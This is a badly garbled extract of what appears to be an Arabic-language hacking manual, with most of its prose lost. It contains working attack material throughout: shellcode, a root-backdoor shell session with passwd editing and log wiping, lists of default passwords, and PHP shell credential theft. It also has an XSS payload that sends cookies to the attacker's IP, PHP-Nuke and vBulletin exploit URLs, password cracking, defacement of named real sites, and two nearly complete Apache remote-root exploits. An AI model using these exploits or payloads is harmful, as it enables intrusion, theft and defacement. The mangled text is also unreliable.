www.securityfocus.com :
www.insecure.org/sploits.html
..
..
... ) (
shell code
..
= []char shellcode
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
"
"\
"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
"\;"x80\xe8\xdc\xff\xff\xff/bin/sh
.. bin/sh/
..
.
...
..
..
bash-2.03$ telnet myshellaccount 23
...Trying xx.xx.xx.xx
.Connected to yourshellaccount
.'[^' Escape character is
Welcome to yourshellaccount
login: malicioususer
(Password: (it doesn't display
246
247
.. dev
null
= D =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
-:
sh-2.03$ chmod 4775 nul
4775 suid .
chmod +s nul ..
..
..
sh-2.03$ exit
80 = D :
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
=(
.. suid sushi
sash A
stand-alone shell
...
suid bin/sh/ sushi
-2
etc/passwd/
-: vi
sh-2.03$ vi /etc/passwd
vi
luser:passwd:uid:gid:startdir:shell
uid & gid =0
:
dood::0:0:dood:/:/bin/sh
sh-2.03$ su dood
sh-2.03$ whoami
dood
248
tty1
root
zap2
: luser
sh-2.03$ ./zap2 luser
!Zap2
sh-2.03$ who
sh-2.03$
:
249
..
.
" "
> <
> : <
...
250
FreeServers.com
:
Caller ID
...
notepade
Hakkerz.home.ml.org
html
@Blahblahblah
header
IP Whois
251
finger
@Finger
scan ports IP
Linux /Unix systems
Exploit Generator
linux 21
FTP 23 TelNet
Telnet Anonymous
hakkerz.home.ml.org telnet 23
www telnet.Victim.com
telnet www
whois
21 ftp
SYST 80 http
Whats
?Running
Login: root$
Password: root$
linux
telnet
ACCOUNT: PASSWORD
)login) root: (password) root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
252
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
whois unix
passwd
ftp
internet explorer
IP jammer .hakkerz.home.ml.org
253
254
PHP Shell
**-----------------------------------------------
:
**-----------------------------------------------
ls -a :
**-----------------------------------------------
cat -e : cat
**-----------------------------------------------
rm -f :
**-----------------------------------------------
rm -d :
**-----------------------------------------------
cp -i :
**-----------------------------------------------
mv :
**-----------------------------------------------
:
help--
255
ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
256
-1
-2
-3
-4
-5
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
!!!
-1
: hacked.txt
**-----------------------------------------------
-2
**-----------------------------------------------
-3 .
257
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
PHP Shell 2
.
**-----------------------------------------------
-1 My SQL config.php
PHP Shell
cat config.php
258
**-----------------------------------------------
-2 htpasswed.
htaccess.
/home/site/.htpasswds/forum/admin/passwd :
cat /home/site/.htpasswds/forum/admin/passwd :
DES
user:nymw4oS3oerdY
**-----------------------------------------------
-3 : service.pwd
DES
:
_vti_pvt
cat /home/site/www/_vti_pvt/service.pwd :
: DeXXa
user:nymw4oS3oerdY
**-----------------------------------------------
-4 :
phpMyAdmin
config.php
!!
259
260
:
/home/site/public_html
/home/site/www
**-----------------------------------
-3
.
261
262
)(
)(
:
TCP sequencability
.
263
" "
> <
><network access :
) (
%50 %50
aswind.COM
ip
INTERNIC.NET
INTERNIC.NET
:
NSLOOKUP
SET TYPE = ALL
aswind.COM
:
Domain Name: ASWIND.COM
264
C 200.200.200.0 LMHOSTS
NetBios N2 = 200.200.200.2 Net view
//servername N1 N254
1 254
\
Administrator
Windwos
username and password net user
Messenger Service
NetBios
IP 200.200.200.200 nbtstat -a 200.200.200.200
MSBROWSER )
(
John IP 200.200.200.50
Nbtstat -a 200.200.200.50 john
265
johnPC
) ( Administrator
Messenger Service )
(
MSBROWSER nbtstat -a
nt senstiver )
(.
l0pthcrack .
266
... ..
===========================================================
=====================================
:
...
.
:
.Hello FOLKS board. This is a message
><SCRIPT>malicious code</SCRIPT
.This is the end of my message
malicious code
...
HTML
>script>document.write('<img
<src="http://my_ip_address/'+document.cookie+'">';</script
>?A HREF="http://example.com/comment.cgi
<mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A
comment.cgi
268
mycomment
.
BADFILE
cross-site scripting " "
CSS
=========================================================
:
http://www.cert.org/advisories/CA-2000-02.html
http://www.perl.com/pub/a/2002/02/20/css.html
269
" "
> <
> :<
, ...
, - - - - ......
........... :
.
.
.
.
.
.
.
.
.
.
.
.
.
:
==================================================
=
--><h3>put your text here<xmp><plaintext
==================================================
270
:
=====
!
" "
> <
><Dr^FunnY :
... html
..... ...
" "
" ... "HTML ...
(: .
.
271
" "
> <
= Exploit =
:
..
:
-1
super scan
.
-2
.
www.netcraft.net
!.!!.. ...
-3
-4
/....../www.thesite.com
:
*pl.
Active Perl
* c.
*sh.
www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
www.ussrback.com
www.packetstorm.securify.com
272
www.secureroot.com
www.rootshell.com
.
.
.. shadowed
.encryption
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
...
x ..
:
root:x:0:1:Super-User:/:/sbin/sh
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
= root
= x
shadowed
shadow file
= token
* = Linux : /etc/shadow
token
= SunOS : /etc/shadow *
token
* = FreeBSD : /etc/master.passwd or /etc/shadow x
token
IRIX : /etc/shadow
token = x
! = AIX : /etc/security/passwd
token
* = ConvexOS : /etc/shadow or /etc/shadpw
token
::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::
::::::lp:NP:6445
EpGw4GekZ1B9U
John the ripper
.
x
:
john passwd
passwd
273
:
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996
Loaded 1 password
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE
john.pot
.
" "
> <
>< icer :
:
1
2 ) (
3 ...
4 ...
1
.. ..
..
threads
cgi scaners
..
274
2
) ( shadow ..
...
url .. ..
url rootshell.com
%99 ..
.......
3 :
..
.. commands ..
, http BOF
..
..
....
config.inc
... ..
4 :
:
packetstorm.securify.com /.securityfocus.com /www.insecure.org
/www.rootshell.com .(:
275
" "
><
><oOoDa BE$T :
:
txt. :
..
,.. ..
c. :
.. ..
)_ (compile )(_
... .. Linux
.. Shell Account
:
>---- gcc filenmae.c
:
>--- a.out ..
..
:
a.out xxx.xxx.xxx.xxx/.
:
pl. :
.. Linux Shell Account
exploit :
perl filename.pl xxx.xxx.xxx.xxx
filename xxx.xxx.xxx.xxx/.
276
" "
> <
><DeadLine :
:
:
Microsoft-IIS/5.0 on Windows 2000
98
98 :
Web Folders :
:
:
My Computer
My Computer
Web Folders
:
Add Web Folder
: Add Web Folder
Type the location to add
:
/http://hostname.com
277
hostname
:
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il
:
/http://192.117.143.121
Next :
finish :
Web Folder :
:
http://www.israwine.co.il/ 212.199.43.84
:
.
278
" "
<>
>Arab VireruZ :>
:
twlc: here your 0day from LucisFero and supergate
Posted on Monday, September 24 @ 14:25:58 CDT
topic: advisories
twlc security divison
24/09/2001
.Php nuke BUGGED
:Found by
LucisFero and supergate
twlc/.
Summary
This time the bug is really dangerous...it allows you to 'cp' any file on
...the box... or even upload files
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is
(bugged
Explanation
?Do you need sql password
http://www.server.net/admin.php?
upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfil
e=config.php&userfile_name=hacked.txt
279
280
281
=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-
?http://www.server.net/admin.php
upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=co
nfig.php&userfile_name=ultramode.txt
=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-
:
= config.php ultramode.txt
(-:
http://server.com/ultramode.txt
=-
-1 server.com
-2 http://server.com/nuke :
-3 5.2 .
282
<angels-bytes
))*/ angels-bytes.com ((
*/
*/ */
include#
include#
include#
include#
include#
include#
include#
include#
include#
283
include#
include#
define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it#
/* failed
define RET_ADDR_INC 512#
define MEMCPY_s1_OWADDR_DELTA -146#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
define REP_POPULATOR 24#
define REP_RET_ADDR 6#
define REP_ZERO 36#
define REP_SHELLCODE 24#
define NOPCOUNT 1024#
define NOP 0x41#
'\\define PADDING_1 \\'A#
'\\define PADDING_2 \\'B#
'\\define PADDING_3 \\'C#
;(define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s#
;define PUT_BYTES(n, b) memset(p, b, n); p += n#
define SHELLCODE_LOCALPORT_OFF 30#
= []char shellcode
\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\\\\ "\\\
\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8 \\\
"\\\x1f\\
\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\ "\\\
\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a \\\
"\\\x02\\
\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\\\\ "\\\
\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24 \\\
"\\\x04\\
\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\ "\\\
\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00 \\\
"\\\xb8\\
\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff \\\\ "\\\
\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08 \\\
"\\\x03\\
\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b \\\\ "\\\
\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01 \\\
"\\\x89\\
284
\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\\\\ "\\\
\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd \\\
"\\\x80\\
\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\\\\ "\\\
\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0 \\\
"\\\x50\\
\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\ "\\\
\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\
;"\\\xcc\\
} struct
;char *type
;u_long retaddr
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae"\\\ }
;{
} ([]int main(int argc, char *argv
;char *hostp, *portp
;unsigned char buf[512], *expbuf, *p
;int i, j, lport
;int sock
;int bruteforce, owned, progress
;u_long retaddr
;struct sockaddr_in sin, from
} (if(argc != 3
;([printf(\\\"Usage: %s \\\\n\\\", argv[0
;("\\\printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n
printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000
;("\\\127.0.0.1:8080\\\\n
;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n
;("\\\printf(\\\"Target ID / Target specification\\\\n
(++for(i = 0; i < sizeof(targets)/8; i
;(printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type
;return -1
{
285
286
287
} (if(progress == 1
;((memset(buf, 0, sizeof(buf
sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport
,"\\\%u
;(retaddr, (unsigned int)(p - expbuf), lport
;((memset(buf + strlen(buf), \\' \\', 74 - strlen(buf
;(puts(buf
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar((rand()%2)? \\'P\\': \\'p
;(fflush(stdout
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = EXPLOIT_TIMEOUT
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, &tv) > 0
} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) <= 0
;break
} (if(!owned && n >= 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0
;("\\\printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n
;(printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr
sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD local
;("\\\kernel exploit to gain instant r00t\\\\n
;((write(sock, expbuf, strlen(expbuf
;++owned
{
;(write(1, buf, n
{
} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0
;(exit(1
;(write(sock, buf, n
288
{
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
;("\\\fprintf(stderr, \\\"Ooops.. hehehe!\\\\n
;return -1
{
{
;return 0
{
:Exploit #2
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
__ifdef __linux#
include#
endif#
/* define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field#
define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use another#
"\\\bug/backdoor/feature (hi Theo!) to gain instant r00t\\';\\\\n
define RET_ADDR_INC 512#
define PADSIZE_1 4#
define PADSIZE_2 5#
define PADSIZE_3 7#
289
290
\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04 \\\
"\\\xcd\\\\x80\\
\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\ "\\\
\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89 \\\
"\\\xe3\\\\x50\\
\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\ "\\\
;"\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\
;
} struct
/* char *type; /* description for newbie penetrator
/* !int delta; /* delta thingie
/* u_long retaddr; /* return address
/* int repretaddr; /* we repeat retaddr thiz many times in the buffer
/* int repzero; /* and \\\\0\\'z this many times
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36"\\\ }
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36"\\\ }
OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,"\\\ }
,{ 36
,{ NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
;victim ,{
} (void usage(void
;int i
printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache;("\\\nosejob.c\\\\n\\\\n
;("\\\printf(\\\"Usage: ./apache-nosejob <-switches> -h host[:80]\\\\n
;("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n
;("\\\printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n
;("\\\printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n
;("\\\printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n
;("\\\printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,
291
;("\\\0x080e0000/nbsd.\\\\n
printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to
;("\\\overwrite\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n
;("\\\printf(\\\" Optional stuff:\\\\n
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for
;("\\\shellcode reply\\\\n
printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode
;("\\\replies\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n
printf(\\\"\\\\nExamples will be published in upcoming apache-scalp;("\\\HOWTO.pdf\\\\n
;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n
;("\\\printf(\\\" ID / Return addr / Target specification\\\\n
(++for(i = 0; i < sizeof(targets)/sizeof(victim); i
;(printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type
;(exit(1
{
} ([]int main(int argc, char *argv
;char *hostp, *portp, *cmdz = DEFAULT_CMDZ
;u_char buf[512], *expbuf, *p
;int i, j, lport, sock
;int bruteforce, owned, progress, sc_timeout = 5
;int responses, shown_length = 0
;struct in_addr ia
;struct sockaddr_in sin, from
;struct hostent *he
(if(argc < 4
;()usage
;bruteforce = 0
;((memset(&victim, 0, sizeof(victim
} (while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1
} (switch(i
/* required stuff */
:'\\case \\'h
;("\\\:"\\\ ,hostp = strtok(optarg
(if((portp = strtok(NULL, \\\":\\\")) == NULL
;"\\\portp = \\\"80
292
;break
/* predefined targets */
:'\\case \\'t
} ((if(atoi(optarg) >= sizeof(targets)/sizeof(victim
;("\\\printf(\\\"Invalid target\\\\n
;return -1
{
;((memcpy(&victim, &targets[atoi(optarg)], sizeof(victim
;break
/* !bruteforce */
:'\\case \\'b
;++bruteforce
;"\\\victim.type = \\\"Custom target
;(victim.retaddr = strtoul(optarg, NULL, 16
printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",
;(victim.retaddr
;break
:'\\case \\'d
;(victim.delta = atoi(optarg
;(printf(\\\"Using %d as delta\\\\n\\\", victim.delta
;break
:'\\case \\'r
;(victim.repretaddr = atoi(optarg
printf(\\\"Repeating the return address %d times\\\\n\\\",
;(victim.repretaddr
;break
:'\\case \\'z
;(victim.repzero = atoi(optarg
;(printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero
;break
:'\\case \\'o
;++bruteforce
} (switch(*optarg
:'\\case \\'f
;"\\\victim.type = \\\"FreeBSD
;victim.retaddr = 0x80a0000
;victim.delta = -150
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'o
;"\\\victim.type = \\\"OpenBSD
293
;victim.retaddr = 0x80000
;victim.delta = -146
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'n
;"\\\victim.type = \\\"NetBSD
;victim.retaddr = 0x080e0000
;victim.delta = -90
;victim.repretaddr = 5
;victim.repzero = 42
;break
:default
;("\\\printf(\\\"[-] Better luck next time!\\\\n
;break
{
;break
/* optional stuff */
:'\\case \\'w
;(sc_timeout = atoi(optarg
printf(\\\"Waiting maximum %d seconds for replies from
;(shellcode\\\\n\\\", sc_timeout
;break
:'\\case \\'c
;cmdz = optarg
;break
:default
;()usage
;break
{
{
} (if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero
printf(\\\"[-] Incomplete target. At least 1 argument is missing (nmap
;("\\\style!!)\\\\n
;return -1
{
;("\\\ ..printf(\\\"[*] Resolving target host
;(fflush(stdout
;(he = gethostbyname(hostp
(if(he
;(memcpy(&ia.s_addr, he->h_addr, 4
} (else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY
;(printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp
294
;return -1
{
;((printf(\\\"%s\\\\n\\\", inet_ntoa(ia
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC
/* skip invalid return adresses */
((if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4
;continue
;(sock = socket(PF_INET, SOCK_STREAM, 0
;sin.sin_family = PF_INET
;sin.sin_addr.s_addr = ia.s_addr
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"[*] Connecting
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
(REP_SHELLCODE
PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero)) +
;((REP_POPULATOR * (1024 +
PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\"
;("\\\HOST_PARAM \\\"\\\\r\\\\n
} (++for (i = 0; i < REP_SHELLCODE; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_3, PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
;(memcpy(p, shellcode, sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
} (++for (i = 0; i < REP_POPULATOR; i
295
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_1, PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < victim.repretaddr; j
;p++ = victim.retaddr & 0xff*
;p++ = (victim.retaddr >> 8) & 0xff*
;p++ = (victim.retaddr >> 16) & 0xff*
;p++ = (victim.retaddr >> 24) & 0xff*
{
;(PUT_BYTES(victim.repzero, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
;("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2
;(PUT_STRING(buf
;(PUT_BYTES(PADSIZE_2, PADDING_2
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta
;(PUT_STRING(buf
} (if(!shown_length
;((printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p - expbuf
;shown_length = 1
{
;(write(sock, expbuf, p - expbuf
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
;(printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr
(++ for(i = 0; i < 40; i
;("\\\ "\\\)printf
;("\\\printf(\\\"\\\\n
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar(((rand()>>8)%2)? \\'P\\': \\'p
;(fflush(stdout
;responses = 0
} (while (1
;fd_set fds
;int n
;struct timeval tv
296
;tv.tv_sec = sc_timeout
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0
} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) < 0
;break
(if(n >= 1
}
(if(!owned
}
(++ for(i = 0; i < n; i
('\\if(buf[i] == \\'G
;++ responses
else
;responses = 0
(if(responses >= 2
}
;owned = 1
;(write(sock, \\\"O\\\", 1
;((write(sock, cmdz, strlen(cmdz
printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,
;(victim.retaddr, victim.repretaddr, victim.repzero
printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen
;("\\\ :now
;(fflush(stdout
{
else {
;(write(1, buf, n
{
{
} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0
;(exit(1
;(write(sock, buf, n
{
{
(if(!owned
297
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
;("\\\fprintf(stderr, \\\"Ooops.. hehehe!\\\\n
;return -1
{
{
;return 0
{
(( angels-bytes.com ))
http://www.angels-bytes.com/?show=tools&action=info&id=19
298
" "
><
php
) ( vb /
-1
.
-2 index.php admin
/
>?php
;"LOGIN = "User$
;"PASSWORD = "Password$
} (function error ($error_message
".echo $error_message
";
;exit
{
( && )if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN
} ( (( "$PHP_AUTH_PW == "$PASSWORD
;(""header("WWW-Authenticate: Basic entrer="Form2txt admin
;("header("HTTP/1.0 401 Unauthorized
<error("<p align=right><font face=Tahoma size=2 color=Red
>;("<font></p/
{
?<
User
Password
299
-3 3000
!!
.
-4 HTML ..
.
-5 . .
300
Log ..
.. Apche logs . Acces Log
..
.. :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
%20bblastvi;1012444064=[20
sit=1011983161
..
..
..
?http://www.victim.com/vb/index.php
[bbuserid=[userid]&bbpassword=[password hash
" : ) " (....
) ( ..
.. )(
.. .. Forgot Password
..
!! ! ..
-----------
---------- HTML ) + + +
( ... +
) HTML (
.. IMG > <script ><img
> <Demon
... .
. Be Secret .. Dont' be Lamer
2002 - 1 - 31 :
2.2.0 .
301
" "
> <
> : <
7
1
2
3 SQL
4
5
6 %80
7
%100
****************
1
Powered by: vBulletin
1
2
3 %60
?http://www.vbulletin.org/index.php
<topic=<script>alert(document.cookie)</script
302
2
http://www.vbulletin.org/index.php?|
=forum/view.php&topic=../../../../../../../etc/passwd
********************
113
Jouko Pynnonen ( )
vBulletin (http://www.vbulletin.com/) is a commonly used web forum
,system written in PHP. One of its key features is use of templates
which allow the board administrator to dynamically modify the look of
.the board
vBulletin templates are parsed with the eval() function. This could be
somewhat safe as long as the parameters to eval() are under strict
control. Unfortunately this is where vBulletin fails. With an URL
crafted in a certain way, a remote user may control the eval() parameters
.and inject arbitrary PHP code to be executed
A remote user may thus execute any PHP code and programs as the
web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
.containing the forums and user information
According to the authors the vulnerability exist in all versions of
vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer
overrun or other platform-dependant issues, so it's presumably
.exploitable under any OS or platform
DETAILS
=======
vBulletin templates are implemented in the following way: the
